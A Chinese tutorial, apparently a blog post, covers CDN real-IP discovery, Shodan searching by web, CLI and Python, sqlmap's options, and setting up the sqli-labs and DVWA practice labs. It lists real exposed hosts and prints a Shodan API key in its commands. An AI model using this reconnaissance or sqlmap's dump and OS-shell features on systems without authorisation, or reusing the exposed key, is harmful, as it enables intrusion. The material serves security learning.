文章目录
一、真实IP地址收集
1.CDN介绍
CDN的全称是Content Delivery Network,即内容分发网络。
其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。
其目的是使用户可就近取得所需内容,解决Internet网络拥挤的状况,提高用户访问网站的响应速度。
CDN的优势:
- CDN节点解决了跨运营商和跨地域访问的问题,访问延时大大降低;
- 大部分请求在CDN边缘节点完成,CDN起到了分流作用,减轻了源站的负载。
劣势:
不能访问到真实的IP。
更进一步的介绍可参考https://www.cnblogs.com/xinxiucan/p/7832368.html。
扩展——负载均衡
负载均衡(Load balancing),是一种计算机技术,用来在多个计算机(计算机集群)、网络连接、CPU、磁盘驱动器或其他资源中分配负载,以达到最优化资源使用、最大化吞吐率、最小化响应时间、同时避免过载的目的。。
将负载(工作任务,访问请求)进行平衡、分摊到多个操作单元(服务器,组件)上进行执行。是解决高性能,单点故障(高可用),扩展性(水平伸缩)的终极解决方案。
更多介绍可参考https://www.cnblogs.com/fanBlog/p/10936190.html。
2.判断是否有CDN(即是否是真实的IP)
- 方法一:通过ping来判断
ping www.baidu.com
打印
正在 Ping www.a.shifen.com [14.215.177.38] 具有 32 字节的数据:
来自 14.215.177.38 的回复: 字节=32 时间=49ms TTL=54
来自 14.215.177.38 的回复: 字节=32 时间=49ms TTL=54
来自 14.215.177.38 的回复: 字节=32 时间=48ms TTL=54
来自 14.215.177.38 的回复: 字节=32 时间=49ms TTL=54
14.215.177.38 的 Ping 统计信息:
数据包: 已发送 = 4,已接收 = 4,丢失 = 0 (0% 丢失),
往返行程的估计时间(以毫秒为单位):
最短 = 48ms,最长 = 49ms,平均 = 48ms
显然,正在Ping www.a.shifen.com,不是百度的地址,说明使用了CDN,返回的地址也是CDN服务器的地址。
- 方法二:通过设置代理或者利用在线ping网站来使用不同地区的ping服务器来测试目标
很多网站都在使用CDN。
访问网站时获取到的IP可能会返回状态码:
403–禁止访问
301–永久重定向
307–临时重定向
3.绕过CDN
如果目标没有使用CDN,可以直接利用ping获得IP地址。
或者利用在线网站验证IP地址,利用IP地址对web站点进行访问,如果正常表明是真实IP地址,否则不为真。
- http://www.ip138.com
示例如下:
- https://securitytrails.com/
示例如下:
二、shodan介绍和搜索
1.信息收集方式
- 主动信息收集:
直接与目标进行交互,通过对交互过程中的信息进行收集,如通过nmap收集信息。 - 被动信息收集:
通过第三方引擎与目标交互,或不予目标交互查询数据库,获得目标的信息,如Google Hacking。
2.shodan搜索引擎介绍
虽然目前人们都认为谷歌是最强的搜索引擎,但shodan才是互联网上最可怕的搜索引擎。与谷歌不同的是,shodan不是在网上搜索网址,而是直接进入互联网的背后通道。shodan可以说是一 款“黑暗”谷歌,在寻找着所有和互联网关联的服务器、摄像头、打印机、路由器等。
3.shodan注册、登录与搜索
shodan网址:https://www.shodan.io/。
注册生成的API KEY会在命令行操作和Python等语言编程中用于初始化。
搜索方式:
(1)在explorer搜索框中输入webcam进行搜索:
示例:
随便点击一个可得
有80、81和8081三个端口开放,中间件是apache,还可以获取很多其他信息。
(2)通过关键字port指定具体端口号:
示例:
port:3306
显示:
随便点击一个进入,可得
除了得到暴露的端口3306等,还可以进一步得到很多其他信息。
(3)通过关键字host指定具体IP地址:
示例:
点击进去可得
显然,除了开放的端口,还可以得到很多其他信息。
(4)通过关键字city指定搜索具体城市的内容:
示例:
随便点击一个可得
显然,暴露了很多信息。
三、shodan命令行使用介绍
shodan安装命令行:
pip install shodan
查看帮助:
shodan -h
打印
Usage: shodan [OPTIONS] COMMAND [ARGS]...
Options:
-h, --help Show this message and exit.
Commands:
alert Manage the network alerts for your account
convert Convert the given input data file into a...
count Returns the number of results for a search
data Bulk data access to Shodan
domain View all available information for a domain
download Download search results and save them in a...
honeyscore Check whether the IP is a honeypot or not.
host View all available information for an IP...
info Shows general information about your account
init Initialize the Shodan command-line
myip Print your external IP address
org Manage your organization's access to Shodan
parse Extract information out of compressed JSON...
radar Real-Time Map of some results as Shodan finds...
scan Scan an IP/ netblock using Shodan.
search Search the Shodan database
stats Provide summary information about a search...
stream Stream data in real-time.
version Print version of this tool.
初始化:
shodan init MJJxEpAgEZBSX2W3gf0Dtuo6d9cfx2Xp
打印
Successfully initialized
使用:
查询apache服务器数量:
shodan count apache
打印
26271967
结果只包含数据库中的数量。
搜索shodan数据库:
shodan search apache
打印
23.225.88.249 9017 HTTP/1.1 404 Not Found\r\nDate: Wed, 12 Feb 2020 02:02:05 GMT\r\nServer: Apache/2.4.18 (Ubuntu)\r\nstatus: 404 Not Found\r\n
Content-Length: 0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n
139.129.167.215 80 HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 02:05:38 GMT\r\nServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15\r\nLast-Mo
dified: Fri, 26 Aug 2016 02:32:44 GMT\r\nETag: "2a43-53af0545360e3"\r\nAccept-Ranges: bytes\r\nContent-Length: 10819\r\nContent-Type: text/html\r\n\r\n
185.15.252.124 80 mail.domovpetra.cz HTTP/1.0 401 Unauthorized\r\nDate: Wed, 12 Feb 2020 02:09:06 GMT\r\nServer: Apache/2.2.16 (Debian)\r\nX-Powe
red-By: PHP/5.3.3-7+squeeze15\r\nWWW-Authenticate: Basic realm="Administrace 185.15.252.124"\r\nVary: Accept-Encoding\r\nContent-Length: 74\r\nConnection: c
lose\r\nContent-Type: text/html\r\n\r\n
198.204.254.59 3092 raik.popepic.net HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 01:59:17 GMT\r\nServer: Apache/2.4.29 (Ubuntu)\r\nContent-Length:
18\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n
154.194.65.196 80 HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 02:06:30 GMT\r\nServer: Apache\r\nUpgrade: h2\r\nConnection: Upgrade, close\r\nLas
t-Modified: Tue, 23 Oct 2018 07:08:31 GMT\r\nETag: "52e-578e00980d9c0"\r\nAccept-Ranges: bytes\r\nContent-Length: 1326\r\nVary: Accept-Encoding\r\nContent-T
ype: text/html\r\n\r\n
103.6.244.220 80 eggfruit.icorehosting.com HTTP/1.1 200 OK\r\nDate: Wed, 12 Feb 2020 02:06:27 GMT\r\nServer: Apache\r\nUpgrade: h2,h2c\r\nConne
ction: Upgrade\r\nLast-Modified: Sun, 13 Nov 2016 07:49:43 GMT\r\nETag: "c2-54129f75bb3c0"\r\nAccept-Ranges: bytes\r\nVary: Accept-Encoding,User-Agent\r\nCo
ntent-Length: 194\r\nContent-Type: text/html\r\n\r\n
35.130.70.227 80 035-130-070-227.biz.spectrum.com HTTP/1.1 302 Found\r\nDate: Wed, 12 Feb 2020 02:06:18 GMT\r\nServer: Apache\r\nX-Frame-Optio
ns: SAMEORIGIN\r\nLocation: https://35.130.70.227/server-manager/\r\nContent-Length: 221\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n
107.148.199.115 7003 107.148.199.115.news10.shoesusoutlet.com HTTP/1.1 404 Not Found\r\nDate: Wed, 12 Feb 2020 02:04:51 GMT\r\nServer: Apache/2.4.
29 (Ubuntu)\r\nstatus: 404 Not Found\r\nContent-Length: 0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n
92.118.239.180 9500 HTTP/1.1 404 Not Found\r\nDate: Wed, 12 Feb 2020 02:05:38 GMT\r\nServer: Apache/2.4.18 (Ubuntu)\r\nstatus: 404 Not Found\r\n
Content-Length: 0\r\nContent-Type: text/html; charset=utf-8\r\n\r\n
38.72.78.36 80 HTTP/1.1 302 Found\r\nServer: Apache-Coyote/1.1\r\nCache-Control: private\r\nExpires: Wed, 31 Dec 1969 17:00:00 MST\r\nLocat
ion: https://38.72.78.36/\r\nContent-Length: 0\r\nDate: Wed, 12 Feb 2020 02:05:01 GMT\r\n\r\n
81.146.24.25 8085 host81-146-24-25.range81-146.btcentralplus.com HTTP/1.1 401 Unauthorized\r\nServer: Apache\r\nConnection: Close\r\nContent-type: te
xt/html\r\nWWW-Authenticate: Digest realm="DSLForum CPE Management", algorithm=MD5, qop=auth, stale=FALSE, nonce="7ab612def3d537d4f3bea0af684dfb0e", opaque=
"5ccc069c403ebaf9f0171e9517f40e41"\r\n\r\n
-- More --
因返回结果较多,点击回车可继续i向下浏览。
此过程相对较慢。
搜索iis服务:
shodan search microsoft iis 6.0
打印
81.2.194.180 80 pidi.forpsi.com HTTP/1.1 200 OK\r\nDate: Thu, 13 Feb 2020 01:19:06 GMT\r\nContent-Length: 2981\r\nContent-Type: text/html\r\nContent
-Location: http://roga.cz/index.htm\r\nLast-Modified: Wed, 29 Nov 2006 14:51:13 GMT\r\nAccept-Ranges: bytes\r\nETag: "808672d0c513c71:65e"\r\nServer: Micros
oft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\n\r\n
45.201.116.21 80 HTTP/1.1 200 OK\r\nContent-Length: 20205\r\nContent-Type: text/html\r\nContent-Location: http://newsky-mold.com/index.html\r
\nLast-Modified: Wed, 30 May 2018 04:26:52 GMT\r\nAccept-Ranges: bytes\r\nETag: "2094726fcef7d31:a4b"\r\nServer: Microsoft-IIS/6.0\r\nDate: Wed, 12 Feb 2020
17:20:17 GMT\r\n\r\n
62.1.8.111 80 lifestyletravel.forth-crs.gr;leto.forth-crs.gr;levriero.forth-crs.gr;ferries-greece.forth-crs.gr;marinetours.forth-crs.gr;dimidis.fo
rth-crs.gr;itertravel.forth-crs.gr;greekferries2.forth-crs.gr;flightsgr.forth-crs.gr;travelpass.forth-crs.gr;greciacultura.forth-crs.gr;levanteferries.forth
-crs.gr;magnatravel.forth-crs.gr;w2.forth-crs.gr;aquaferries.forth-crs.gr;airexelixi.forth-crs.gr;aliweb.forth-crs.gr;imis.forth-crs.gr;dorkastravel.forth-c
rs.gr;webstatswwwn2.forth-crs.gr;bestway.forth-crs.gr;ticketpad.forth-crs.gr;folegandrostravel.forth-crs.gr;travelplan.forth-crs.gr;aegeastravel.forth-crs.g
r;wwwn2.forth-crs.gr;myways.forth-crs.gr;greekferries.forth-crs.gr;ioniangroup.forth-crs.gr;piraeustravelservices.forth-crs.gr;greekferriesclub.forth-crs.gr
;keatours.forth-crs.gr;zorpidis.forth-crs.gr;ctrs.forth-crs.gr;ostriatravel.forth-crs.gr;mastravel.forth-crs.gr;airmaritime.forth-crs.gr;ferries-greece2.for
th-crs.gr;greece-ferries.forth-crs.gr;grab.forth-crs.gr;exodostravel.forth-crs.gr HTTP/1.1 403 Forbidden\r\nContent-Length: 218\r\nContent-Type: text/
html\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nDate: Thu, 13 Feb 2020 01:18:39 GMT\r\n\r\n
103.30.41.143 80 HTTP/1.1 200 OK\r\nContent-Length: 431\r\nContent-Type: text/html\r\nContent-Location: http://103.30.41.143/index.html\r\nLa
st-Modified: Sat, 08 Feb 2020 20:27:59 GMT\r\nAccept-Ranges: bytes\r\nETag: "e4f95c41beded51:fec"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.NET\r\nD
ate: Thu, 13 Feb 2020 01:16:02 GMT\r\n\r\n
204.44.105.62 80 a.h.qn.holcldttl.com HTTP/1.1 200 OK\r\nConnection: close\r\nDate: Thu, 13 Feb 2020 01:20:28 GMT\r\nServer: Microsoft-IIS/6.0\r\n
X-Powered-By: ASP.NET\r\nX-Powered-By: PHP/5.2.17\r\nContent-type: text/html\r\n\r\n
172.80.58.134 80 HTTP/1.1 200 OK\r\nContent-Length: 53244\r\nContent-Type: text/html\r\nContent-Location: http://828816.com/index.htm\r\nLast
-Modified: Thu, 03 Jan 2019 05:05:36 GMT\r\nAccept-Ranges: bytes\r\nETag: "14266bf621a3d41:3a86"\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: WAF/2.0\r\nDa
te: Thu, 13 Feb 2020 01:21:05 GMT\r\n\r\n
203.231.127.53 80 HTTP/1.1 302 Moved Temporarily\r\nConnection: close\r\nDate: Thu, 13 Feb 2020 01:21:12 GMT\r\nServer: Microsoft-IIS/6.0\r\nX
-Powered-By: ASP.NET\r\nlocation: http://ebiz.heung-a.com/\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n
66.254.180.167 80 HTTP/1.1 403 Forbidden\r\nContent-Length: 218\r\nContent-Type: text/html\r\nServer: Microsoft-IIS/6.0\r\nX-Powered-By: ASP.N
-- More --
指定搜索条件进行搜索:
shodan search --fields ip_str,port,hostname tomcat
打印
121.41.11.14 8089
42.101.46.78 8081
66.35.73.105 8081
121.78.79.82 8081
213.175.217.202 8080
185.42.238.41 80
117.78.8.169 8081
64.82.245.252 8080
80.91.88.130 49153
15.185.130.138 3117
47.93.22.104 8081
90.147.33.88 8080
167.179.3.31 80
120.24.193.235 8081
139.196.198.125 80
39.105.222.63 8083
39.96.23.184 8083
58.64.130.35 8181
34.196.124.24 80
54.252.212.190 9944
54.252.212.190 8043
52.66.245.176 5357
18.144.80.167 2021
67.43.25.97 80
202.115.162.45 8081
-- More --
获取指定IP地址信息:
shodan host 213.136.73.36
打印
213.136.73.36
Hostnames: -
City: Nürnberg
Country: Germany
Organization: Contabo GmbH
Updated: 2020-02-06T20:35:42.365722
Number of open ports: 3
Ports:
22/tcp OpenSSH (7.6p1 Ubuntu-4ubuntu0.3)
25/tcp Exim smtpd (4.90_1)
80/tcp
获取用户账号信息:
shodan info
打印
Query credits available: 0
Scan credits available: 0
获取自身外部IP地址:
shodan myip
打印
139.202.xx.xxx
检查是否有蜜罐保护:
蜜罐技术:
本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强实际系统的安全防护能力。
shodan honeyscore 213.136.73.36
打印
Score: 0.3
四、Python中shodan使用
import shodan
# 常量,大写
SHODAN_API_KEY = 'MJJxEpAgEZBSX2W3gf0Dtuo6d9cfx2Xp'
# 初始化
api = shodan.Shodan(SHODAN_API_KEY)
result = api.search('tomcat', page=1)
print(result['total'])
打印
85435
再进行测试:
import shodan
# 常量,大写
SHODAN_API_KEY = 'MJJxEpAgEZBSX2W3gf0Dtuo6d9cfx2Xp'
# 初始化
api = shodan.Shodan(SHODAN_API_KEY)
result = api.host('213.136.73.36')
print(result)
print(result['country_name'])
打印:
{'region_code': '02', 'ip': 3582478628, 'postal_code': '90475', 'country_code': 'DE', 'city': 'Nürnberg', 'dma_code': None, 'last_update': '2020-02-06T20:35:42.365722', 'latitude': 49.4075, 'tags': [], 'area_code': None, 'country_name': 'Germany', 'hostnames': ['-'], 'org': 'Contabo GmbH', 'data': [{'_shodan': {'id': '944a19e4-6c9b-4488-8146-125c332e4558', 'options': {}, 'ptr': True, 'module': 'smtp', 'crawler': 'd264629436af1b777b3b513ca6ed1404d7395d80'}, 'product': 'Exim smtpd', 'hash': 238085194, 'version': '4.90_1', 'opts': {}, 'ip': 3582478628, 'isp': 'Contabo GmbH', 'os': None, 'cpe': ['cpe:/a:exim:exim:4.90_1'], 'port': 25, 'hostnames': ['-'], 'location': {'city': 'Nürnberg', 'region_code': '02', 'area_code': None, 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'country_name': 'Germany', 'postal_code': '90475', 'dma_code': None, 'country_code': 'DE', 'latitude': 49.4075}, 'timestamp': '2020-02-06T20:35:42.365722', 'domains': ['-.'], 'org': 'Contabo GmbH', 'data': '220 port22.eu ESMTP Exim 4.90_1 Ubuntu Thu, 06 Feb 2020 21:35:38 +0100\r\n250-port22.eu Hello 228.224.176.180 [228.224.176.180]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-CHUNKING\r\n250-PRDR\r\n250 HELP\r\n', 'asn': 'AS51167', 'transport': 'tcp', 'ip_str': '213.136.73.36'}, {'info': 'protocol 2.0', '_shodan': {'id': None, 'options': {}, 'ptr': True, 'module': 'ssh', 'crawler': '5faf2928ceb560cb4276cc1b4660b2d763cc6397'}, 'product': 'OpenSSH', 'hash': 885925491, 'version': '7.6p1 Ubuntu-4ubuntu0.3', 'location': {'city': 'Nürnberg', 'region_code': '02', 'area_code': None, 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'country_name': 'Germany', 'postal_code': '90475', 'dma_code': None, 'country_code': 'DE', 'latitude': 49.4075}, 'opts': {}, 'ip': 3582478628, 'isp': 'Contabo GmbH', 'os': None, 'cpe': ['cpe:/a:openbsd:openssh:7.6p1 Ubuntu-4ubuntu0.3'], 'port': 22, 'hostnames': ['-'], 'ssh': {'hassh': 'b12d2871a1189eff20364cf5333619ee', 'fingerprint': '6f:71:c5:39:d8:34:55:01:fc:e3:41:67:02:81:fc:71', 'mac': 'hmac-sha2-256', 'cipher': 'aes128-ctr', 'key': 'AAAAB3NzaC1yc2EAAAADAQABAAABAQDBehzX1E+RxyPeN17W8k7NjGct/X+cT0UakEkpG8pCtXq2\nc1yD7m5fkLbu2V0ELS2ip0ldvNF8IZnoEndWPxcyvaz1nMEugtUqOVOEj93EtXXXOqmid7QdulQZ\n6xSAFeFE4D65VmScQi7eI9iM/OhmlGFOgAyFH1ELJjwic1nX2aX2YOwJrxmsebkSKd1vzBP1zYcE\ngiegwllez196hbcn/FkcWvcKcyo27pGtVmH8TheepnyRk2M2vSTyNcG8o1VNhUCFRsKEfzMWd92i\nM5+5U8SzfhA+F9hxvOJ7XfRbYZd9V/2UwFgia6llAj0n1eSrLN0u3HqLhnI4f9uUl3H9\n', 'kex': {'languages': [''], 'server_host_key_algorithms': ['ssh-rsa', 'rsa-sha2-512', 'rsa-sha2-256', 'ecdsa-sha2-nistp256', 'ssh-ed25519'], 'encryption_algorithms': ['[email protected]', 'aes128-ctr', 'aes192-ctr', 'aes256-ctr', '[email protected]', '[email protected]'], 'kex_follows': False, 'unused': 0, 'kex_algorithms': ['curve25519-sha256', '[email protected]', 'ecdh-sha2-nistp256', 'ecdh-sha2-nistp384', 'ecdh-sha2-nistp521', 'diffie-hellman-group-exchange-sha256', 'diffie-hellman-group16-sha512', 'diffie-hellman-group18-sha512', 'diffie-hellman-group14-sha256', 'diffie-hellman-group14-sha1'], 'compression_algorithms': ['none', '[email protected]'], 'mac_algorithms': ['[email protected]', '[email protected]', '[email protected]', '[email protected]', '[email protected]', '[email protected]', '[email protected]', 'hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1']}, 'type': 'ssh-rsa'}, 'timestamp': '2020-01-27T19:13:34.325121', 'domains': ['-.'], 'org': 'Contabo GmbH', 'data': 'SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\nKey type: ssh-rsa\nKey: AAAAB3NzaC1yc2EAAAADAQABAAABAQDBehzX1E+RxyPeN17W8k7NjGct/X+cT0UakEkpG8pCtXq2\nc1yD7m5fkLbu2V0ELS2ip0ldvNF8IZnoEndWPxcyvaz1nMEugtUqOVOEj93EtXXXOqmid7QdulQZ\n6xSAFeFE4D65VmScQi7eI9iM/OhmlGFOgAyFH1ELJjwic1nX2aX2YOwJrxmsebkSKd1vzBP1zYcE\ngiegwllez196hbcn/FkcWvcKcyo27pGtVmH8TheepnyRk2M2vSTyNcG8o1VNhUCFRsKEfzMWd92i\nM5+5U8SzfhA+F9hxvOJ7XfRbYZd9V/2UwFgia6llAj0n1eSrLN0u3HqLhnI4f9uUl3H9\nFingerprint: 6f:71:c5:39:d8:34:55:01:fc:e3:41:67:02:81:fc:71\n\nKex Algorithms:\n\tcurve25519-sha256\n\[email protected]\n\tecdh-sha2-nistp256\n\tecdh-sha2-nistp384\n\tecdh-sha2-nistp521\n\tdiffie-hellman-group-exchange-sha256\n\tdiffie-hellman-group16-sha512\n\tdiffie-hellman-group18-sha512\n\tdiffie-hellman-group14-sha256\n\tdiffie-hellman-group14-sha1\n\nServer Host Key Algorithms:\n\tssh-rsa\n\trsa-sha2-512\n\trsa-sha2-256\n\tecdsa-sha2-nistp256\n\tssh-ed25519\n\nEncryption Algorithms:\n\[email protected]\n\taes128-ctr\n\taes192-ctr\n\taes256-ctr\n\[email protected]\n\[email protected]\n\nMAC Algorithms:\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\[email protected]\n\thmac-sha2-256\n\thmac-sha2-512\n\thmac-sha1\n\nCompression Algorithms:\n\tnone\n\[email protected]\n\n', 'asn': 'AS51167', 'transport': 'tcp', 'ip_str': '213.136.73.36'}, {'_shodan': {'id': '4493ec63-9af0-46b3-af2d-1f6da2e3b33a', 'options': {}, 'ptr': True, 'module': 'http', 'crawler': '4aca62e44af31a464bdc72210b84546d570e9365'}, 'hash': -945966338, 'os': None, 'opts': {}, 'ip': 3582478628, 'isp': 'Contabo GmbH', 'http': {'html_hash': -1259818618, 'robots_hash': None, 'redirects': [], 'securitytxt': None, 'title': '404 Not Found', 'sitemap_hash': None, 'robots': None, 'favicon': None, 'host': '213.136.73.36', 'html': '<html>\n <head>\n <title>404 Not Found</title>\n <link rel=\'stylesheet\' href=\'style/style.css\' type=\'text/css\'/>\n </head>\n <body bgcolor="#ffffff" text="#000000" link="#2020ff" vlink="#4040cc">\n <h2>404 Not Found</h2>\n <p>The requested URL was not found on this server.</p>\n\n </body>\n\n</html>\n', 'location': '/', 'components': {}, 'server': 'xxx', 'sitemap': None, 'securitytxt_hash': None}, 'port': 80, 'hostnames': ['-'], 'location': {'city': 'Nürnberg', 'region_code': '02', 'area_code': None, 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'country_name': 'Germany', 'postal_code': '90475', 'dma_code': None, 'country_code': 'DE', 'latitude': 49.4075}, 'timestamp': '2020-01-26T07:14:55.014514', 'domains': ['-.'], 'org': 'Contabo GmbH', 'data': 'HTTP/1.1 404 Not Found\r\nServer: xxx\r\nContent-Type: text/html; charset=utf-8\r\nDate: Sun, 26 Jan 2020 07:32:11 GMT\r\nLast-Modified: Sun, 26 Jan 2020 07:32:11 GMT\r\nAccept-Ranges: bytes\r\nConnection: close\r\nCache-Control: no-cache,no-store\r\n\r\n', 'asn': 'AS51167', 'transport': 'tcp', 'ip_str': '213.136.73.36'}], 'asn': 'AS51167', 'isp': 'Contabo GmbH', 'longitude': 11.164899999999989, 'country_code3': 'DEU', 'domains': ['-.'], 'ip_str': '213.136.73.36', 'os': None, 'ports': [80, 25, 22]}
Germany
还可以通过浏览器使用api获取相关内容,并处理返回的JSON字符串得到相关信息。
查看参数与返回结果可点击https://developer.shodan.io/api。
五、Sqlmap介绍
1.sqlmap概念
Sqlmap是一个开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。
它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。
2.sqlmap特点
- 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统;
- 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入;
- 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库;
- 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列;
- 支持自动识别密码哈希格式并通过字典破解密码哈希;
- 支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择;
- 支持在数据库管理系统中搜索指定的数据库名、表名或列名。
3.Sqlmap的下载和使用
下载官方网站http://sqlmap.org/。
如下:
Windows可下载 .zip文件,Linux可下载 .tar.gz文件。
Windows版本可直接点击https://download.csdn.net/download/CUFEECR/12153600下载。
然后解压,可获得如下文件(夹):
在该目录下执行命令:
- 查看帮助文档:
python sqlmap.py -h
打印:
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
Usage: sqlmap.py [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
[!] to see full list of options run with '-hh'
Press Enter to continue...
- 查看版本信息:
python sqlmap.py --version
打印:
1.4.2.31#dev
Press Enter to continue...
六、搭建测试环境
1.下载安装phpstudy并开启服务
phpstudy可以快速在本地搭建Web项目并开启相关服务。
可以在http://phpstudy.php.cn选择合适的版本下载并安装。
安装之后,启动apache和MySQL服务,如下
在phpstudy中启动apache后,访问127.0.0.1可以看到如下所示:
即开启服务成功。
2.sqli安装
将sqli目录拷贝到phpstudy安装目录下的WWW目录下,如下
再访问127.0.0.1/sqli-libs,即可得到如下页面
点击Setup/reset Database for labs如下所示
不能正常显示。此时进入sqli-libs下的sql-connections,编辑db-creds.inc文件:
<?php
//give your mysql connection username n password
$dbuser ='root';
$dbpass ='root';
$dbname ="security";
$host = 'localhost';
$dbname1 = "challenges";
?>
只是修改pass,默认密码为root,如为其他密码做相应更改即可。
此时再访问http://127.0.0.1/sqli-labs/sql-connections/setup-db.php,可能还是会显示和之前一样的界面,如下:
还是不能正常显示。这是php版本不兼容问题,是新版本的PHPstudy不再支持mysql_xxx函数而是支持mysqli_xxx函数所致。
解决方案有两种:
- 方案一:
使用旧版本的PHPStudy,sqli不做改变
旧版phpStudy可点击https://download.csdn.net/download/CUFEECR/12152701或进入官网下载。 - 方案二:
继续使用新版本的PHPStudy,但是使用修改版的sqli-labs
这是一位热心网友改写的,可点击https://download.csdn.net/download/CUFEECR/12152684或https://github.com/Rinkish/Sqli_Edited_Version进行下载,再按照之前的说明进行操作(主要是改db-creds.inc中的密码)。
我采用的是第二种方法,亲测有效,最后再访问http://127.0.0.1/sqli-labs/sql-connections/setup-db.php得到如下页面:
即说明sqli配置成功。
3.DVWA安装
下载DVWA包可点击https://download.csdn.net/download/CUFEECR/12153780。
和sqli一样,将DVWA目录拷贝到phpstudy安装目录下的WWW目录下,再访问127.0.0.1/dvwa,会显示
根据提示操作:
修改目录下的config目录下的文件config.inc.php.dist名字为config.inc.php(即去掉.dist后缀)并找到密码行进行编辑:
$_DVWA[ 'db_password' ] = 'root';
即将密码设为MySQL密码root。
此时再打开页面刷新,如显示如下
则成功配置。
点击左下角Create / Reset Database按钮创建数据库,等待几秒后出现登录页面,默认用户名和密码为admin、password,即可登录进去。
